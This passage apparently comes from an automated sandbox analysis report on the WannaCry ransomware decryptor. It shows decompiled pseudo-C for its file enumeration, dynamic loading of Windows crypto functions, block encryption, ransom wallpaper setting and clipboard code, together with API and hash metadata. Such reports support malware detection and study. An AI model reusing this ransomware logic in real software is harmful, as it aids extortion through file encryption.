													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}
















                                  0x00403cb0
                                  0x00403cbe
                                  0x00403cc6
                                  0x00403cca
                                  0x00403cd3
                                  0x00403cd7
                                  0x00403ceb
                                  0x00403e1f
                                  0x00403e1f
                                  0x00403e23
                                  0x00403e34
                                  0x00403cec
                                  0x00403cf4
                                  0x00403d06
                                  0x00403d0e
                                  0x00403d26
                                  0x00403d2c
                                  0x00403d32
                                  0x00403d4b
                                  0x00403d4d
                                  0x00403d52
                                  0x00403d56
                                  0x00403d69
                                  0x00403d6f
                                  0x00403d75
                                  0x00403d7b
                                  0x00403d7f
                                  0x00403d85
                                  0x00403d8d
                                  0x00403db4
                                  0x00403dbb
                                  0x00403dc0
                                  0x00403dc5
                                  0x00403dcc
                                  0x00403dcd
                                  0x00403dcf
                                  0x00403d8f
                                  0x00403d99
                                  0x00403d9f
                                  0x00403da6
                                  0x00403da7
                                  0x00403da9
                                  0x00403da9
                                  0x00403ddb
                                  0x00403ddd
                                  0x00403de4
                                  0x00403ded
                                  0x00403dfc
                                  0x00403dfc
                                  0x00403e0b
                                  0x00403e0d
                                  0x00403e11
                                  0x00403e11
                                  0x00403d85
                                  0x00403e16
                                  0x00403e1c
                                  0x00403e1c
                                  0x00403d56
                                  0x00403d32
                                  0x00403d0e
                                  0x00000000
                                  0x00403e3a
                                  0x00403e3b
                                  0x00403e50
                                  0x00403e50
                                  0x00403cd9
                                  0x00403ce2
                                  0x00403ce2

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$My Computer$\$\
                                  • API String ID: 1476605332-298172004
                                  • Opcode ID: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                  • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                  • Opcode Fuzzy Hash: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                  • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}





                                  0x00404b78
                                  0x00404b8c
                                  0x00404b90
                                  0x00404c29
                                  0x00404c2c
                                  0x00404b96
                                  0x00404bab
                                  0x00404bb8
                                  0x00404bc5
                                  0x00404bd2
                                  0x00404bdf
                                  0x00404be4
                                  0x00404bec
                                  0x00404bf4
                                  0x00000000
                                  0x00404c22
                                  0x00404c28
                                  0x00404c28
                                  0x00404bf4
                                  0x00404b7a
                                  0x00404b80
                                  0x00404b80

                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                  • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                  • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                  • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                  • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                  • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                  • API String ID: 2238633743-2459060434
                                  • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                  • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0);
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

















                                  0x00407e86
                                  0x00407e9c
                                  0x00407ea4
                                  0x00407ea6
                                  0x00407eb3
                                  0x00407eb8
                                  0x00407eba
                                  0x00407eca
                                  0x00407ed2
                                  0x00407ed4
                                  0x00407ee6
                                  0x00407ef4
                                  0x00407efa
                                  0x00407f00
                                  0x00407f10
                                  0x00407f20
                                  0x00407f26
                                  0x00407f41
                                  0x00407f56
                                  0x00407f73
                                  0x00407f08
                                  0x00407f08
                                  0x00407f08

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                  • wcslen.MSVCRT ref: 00407EF4
                                  • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                  • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                  • API String ID: 13424474-2236924158
                                  • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                  • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}















                                  0x004067f4
                                  0x004067fa
                                  0x00406802
                                  0x0040689c
                                  0x004068a5
                                  0x00406808
                                  0x0040680a
                                  0x0040680f
                                  0x00406823
                                  0x0040682b
                                  0x00406839
                                  0x0040683f
                                  0x00406846
                                  0x0040684c
                                  0x00406866
                                  0x00406879
                                  0x00406884
                                  0x0040688e
                                  0x00406899
                                  0x00406899

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                  • String ID:
                                  • API String ID: 1397574227-0
                                  • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                  • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5);
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207);
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}








































                                  0x0040b3c0
                                  0x0040b3c4
                                  0x0040b3ce
                                  0x0040b3d9
                                  0x0040b3e3
                                  0x0040b3e8
                                  0x0040b3e9
                                  0x0040b3e9
                                  0x0040b3ee
                                  0x0040b3f2
                                  0x0040b3f6
                                  0x0040b602
                                  0x0040b60b
                                  0x0040b615
                                  0x0040b61a
                                  0x0040b61b
                                  0x0040b624
                                  0x0040b628
                                  0x0040b62e
                                  0x0040b632
                                  0x0040b634
                                  0x0040b638
                                  0x0040b651
                                  0x0040b660
                                  0x0040b663
                                  0x0040b66a
                                  0x0040b671
                                  0x0040b678
                                  0x0040b67e
                                  0x0040b685
                                  0x0040b689
                                  0x0040b689
                                  0x0040b685
                                  0x0040b690
                                  0x0040b3fc
                                  0x0040b3fc
                                  0x0040b40a
                                  0x00000000
                                  0x0040b410
                                  0x0040b410
                                  0x0040b417
                                  0x0040b4ed
                                  0x0040b4f0
                                  0x0040b4f4
                                  0x0040b5ba
                                  0x0040b5be
                                  0x0040b5c0
                                  0x0040b5c4
                                  0x0040b5ca
                                  0x00000000
                                  0x0040b5d0
                                  0x0040b5d0
                                  0x0040b5d0
                                  0x0040b5d1
                                  0x0040b5d4
                                  0x0040b5d9
                                  0x0040b5e3
                                  0x0040b5e5
                                  0x0040b5ea
                                  0x0040b5f0
                                  0x0040b5f2
                                  0x0040b5ff
                                  0x0040b5ff
                                  0x0040b4fa
                                  0x0040b4fe
                                  0x0040b500
                                  0x0040b504
                                  0x0040b508
                                  0x0040b50e
                                  0x00000000
                                  0x0040b510
                                  0x0040b516
                                  0x0040b516
                                  0x0040b51c
                                  0x0040b520
                                  0x0040b528
                                  0x0040b52c
                                  0x00000000
                                  0x00000000
                                  0x0040b534
                                  0x0040b538
                                  0x0040b53a
                                  0x0040b541
                                  0x0040b549
                                  0x0040b54a
                                  0x0040b54b
                                  0x0040b53a
                                  0x0040b555
                                  0x0040b559
                                  0x0040b55f
                                  0x0040b56f
                                  0x0040b56f
                                  0x0040b571
                                  0x0040b57b
                                  0x0040b57f
                                  0x0040b581
                                  0x0040b589
                                  0x0040b58a
                                  0x0040b590
                                  0x0040b512
                                  0x00000000
                                  0x0040b592
                                  0x0040b599
                                  0x0040b599
                                  0x00000000
                                  0x0040b590
                                  0x0040b5a5
                                  0x0040b5ab
                                  0x0040b5af
                                  0x0040b5b4
                                  0x0040b5b5
                                  0x00000000
                                  0x0040b5b5
                                  0x0040b50e
                                  0x0040b41d
                                  0x0040b429
                                  0x0040b42b
                                  0x0040b42f
                                  0x0040b435
                                  0x0040b4c5
                                  0x0040b4cc
                                  0x0040b43b
                                  0x0040b43b
                                  0x0040b43f
                                  0x0040b440
                                  0x0040b443
                                  0x0040b44b
                                  0x0040b44f
                                  0x00000000
                                  0x00000000
                                  0x0040b457
                                  0x0040b45b
                                  0x0040b461
                                  0x0040b461
                                  0x0040b467
                                  0x0040b46e
                                  0x0040b476
                                  0x0040b477
                                  0x0040b478
                                  0x0040b467
                                  0x0040b482
                                  0x0040b488
                                  0x0040b48e
                                  0x0040b49e
                                  0x0040b49e
                                  0x0040b4a0
                                  0x0040b4aa
                                  0x0040b4b0
                                  0x0040b4b2
                                  0x0040b4b4
                                  0x0040b4b5
                                  0x0040b4b9
                                  0x0040b4bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040b4bf
                                  0x0040b4d8
                                  0x0040b4de
                                  0x0040b4e2
                                  0x0040b4e7
                                  0x0040b4e8
                                  0x00000000
                                  0x0040b4e8
                                  0x0040b435
                                  0x0040b417
                                  0x0040b40a
                                  0x00000000

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                  • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48clipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}










                                  0x00407c32
                                  0x00407c38
                                  0x00407c40
                                  0x00407cab
                                  0x00407c42
                                  0x00407c55
                                  0x00407c59
                                  0x00407c66
                                  0x00407c6c
                                  0x00407c79
                                  0x00407c7f
                                  0x00407c86
                                  0x00407c89
                                  0x00407c90
                                  0x00407c92
                                  0x00407c9b
                                  0x00000000
                                  0x00407ca8
                                  0x00407c63
                                  0x00407c63

                                  APIs
                                  • OpenClipboard.USER32(?), ref: 00407C38
                                  • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                  • CloseClipboard.USER32 ref: 00407C5B
                                  • EmptyClipboard.USER32 ref: 00407C66
                                  • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                  • CloseClipboard.USER32 ref: 00407CA1
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                  • String ID:
                                  • API String ID: 142981918-0
                                  • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                  • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154encryptionstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
